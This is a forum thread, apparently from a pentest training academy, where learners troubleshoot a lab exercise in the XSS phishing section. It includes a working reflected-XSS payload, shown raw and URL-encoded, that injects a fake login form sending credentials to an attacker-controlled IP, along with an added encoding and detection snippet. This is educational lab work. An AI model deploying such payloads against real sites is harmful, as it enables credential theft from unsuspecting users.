Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

[SPOILERS ALERT!] Hello! Newbie here trying to learn some pentest tools with the academy. First post :)

I am stuck in the exercise of the Phishing section. I have managed to set up the PHP server and the payload that connects to the server. The resultant URL is

https://SERVER-IP/phishing/index.php?url='/><script>document.write('<h3>Please login to continue</h3><form action=http://MY-IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

with SERVER-IP being the HTB machine’s, and MY-IP being my tun0 IP. When I open the link and fill the forms and press enter, my PHP server successfully receives the login details and everything behaves as expected.

The problem is that when I go to https://SERVER-IP/phishing/send.php, paste the mentioned link and press “Send”, the page shows “Issue in sending URL!” and nothing reaches my PHP server.

I have tried URL encoding, with the same result.

Is there something obvious I am missing?

Thanks a lot for any help! :)

Try PHP server with 443.

Thanks for the help! It wasn’t the port, but found the solution anyway. Had to encode the URL, and send HTTP (not https).

I ran into the same issue, but mine had a different cause/solution.

For anyone in the future that gets the “Issue in sending URL!”, double check to make sure the payload you send is exactly what the material provides. Seems a little obvious in hindsight, but I wasted a good bit of time over a “lab-ism” that wouldn’t have mattered in a “real-world” instance; hopefully I can save someone else some trouble. :)

Thanks for this! It was the URL encoding that got me.

Thanks so much, the explanation was helpful; the encoding got me as well.

Has anyone done the skills assessment for that same module? If you have, please DM me; I can use some help. Also, to the question on top: try resetting the target IP. That’s the only thing I can think of.

For me this server was quite unstable and I needed to restart it very often.

Do not forget to test if your local server is accessible from the server (local firewall settings).

I tested the URL and it worked; my problem is setting up the server. I can’t connect to 0.0.0.0:80 because it’s already listening. I tried 8080, 8000, and 81; none of them gets a response. Did everyone use the 0.0.0.0:80 for the address?

[quote=“QuickFix914, post:9, topic:249212”]
Did everyone use the 0.0.0.0:80 for the address?[/quote]

I’m a dunce, I got it. Going to my corner.

My script worked, and like everyone here, I’ve stumbled upon the “Issue in sending URL!” error.
This is what I’ve tried:

  1. Using ZAP browser.
  2. Installing and using Chrome browser.
  3. Using the payload of xlandrexl1 as CyberSecN00b said, as I’ve created a different script than the original.
  4. Encoding both payloads in 6 websites in case the issue was the server didn’t like the format.
  5. As my PHP server used port 8080 (couldn’t close 80, already in use by HTB’s pwnbox), I tried both payloads with :8080 removed from the URL in case the website didn’t like it, although it made no sense.
  6. Finally, and this was the solution, I’ve noticed that the website might not like the encoding of the URL in only some parts (the ones related to the ‘useful’ URL) so it didn’t realize it was a valid URL. So using the payload from xlandrexl1 as an example, it ended up like this:
    http://target.ip/phishing/index.php?url= http:/my.php.server.ip:8080

Hope this helps someone out there!

I’m sorry, it doesn’t allow me to put the correct sentence. What I meant was, you have to encode only the query parameters from the URL, so you would have:
http://target.ip/phishing/index.php?url= ENCODED URL PART http://my.php.server.ip:8080 ENCODED URL PART
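The point of the two posts above (percent-encode only the query value, not the whole link), as an added example that is not part of the original thread. The function names, the `a=1&b=2` suffix on the value and the final sample request are constructed for illustration; nothing here reproduces how the lab's send.php checks its input.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Constructed placeholders in the same shape as the hostnames used in the thread.
BASE = "http://target.ip/phishing/index.php"
VALUE = "http://my.php.server.ip:8080/?a=1&b=2"  # constructed: contains ':', '/', '?', '&'


def unencoded(base, name, value):
    """Paste the value in as-is: its own '&' and '?' get read as outer-URL syntax."""
    return f"{base}?{name}={value}"


def encode_whole_link(base, name, value):
    """Run the finished link through an encoder: the outer '://' and '?' are lost."""
    return quote(f"{base}?{name}={value}", safe="")


def encode_value_only(base, name, value):
    """Percent-encode only the parameter value; the outer URL keeps its structure."""
    return f"{base}?{name}={quote(value, safe='')}"


def received_value(link, name):
    """Value the application gets for `name` once the query string is decoded."""
    parts = urlsplit(link)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None  # the string no longer parses as an http(s) URL
    values = parse_qs(parts.query).get(name)
    return values[0] if values else None


def carries_markup(link, name="url"):
    """Log-review check: the decoded value contains HTML/attribute breakout characters."""
    value = received_value(link, name) or ""
    return any(ch in value for ch in "<>'\"")


if __name__ == "__main__":
    for build in (unencoded, encode_whole_link, encode_value_only):
        link = build(BASE, "url", VALUE)
        print(f"{build.__name__:18} -> {received_value(link, 'url')!r}")
    # Constructed request: percent-encoding does not change what the server decodes.
    print(carries_markup(BASE + "?url='/%3E%3Ch3%3Etest%3C/h3%3E"))
```

Only the value-only form round-trips; the same decoding step is why a filter or log rule has to inspect the decoded parameter rather than the raw request line.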


This scenario is really starting to bother me, and surely there is a better way HTB could check for correct solutions. Like most people above I have a working solution that is as far as I can tell EXACTLY what the material provided.

http://TARGET IP/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://MY IP:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform').remove();%3C/script%3E%3C!--

Naturally, port 80 is in use so the PHP server is running on port 88; other than that I can’t see any difference. I’ve tried encoding in different ways, using different ports, using Burp to send the link in more specific ways like wrapping the address in HTML hyperlink tags.

Could someone please just post a working link so I can understand the awfully specific formatting?

UPDATE: My solution is correct, it now inexplicably works, HTB is just garbage.

Thanks, that helped a lot. I’m really soldiering through and get most of it myself and don’t mind spending hours/days searching for answers, but having a working scenario/link and having it rated incorrect because of encoding issues of parts of the URL is really too much imo of what can be expected. Thanks a heap :).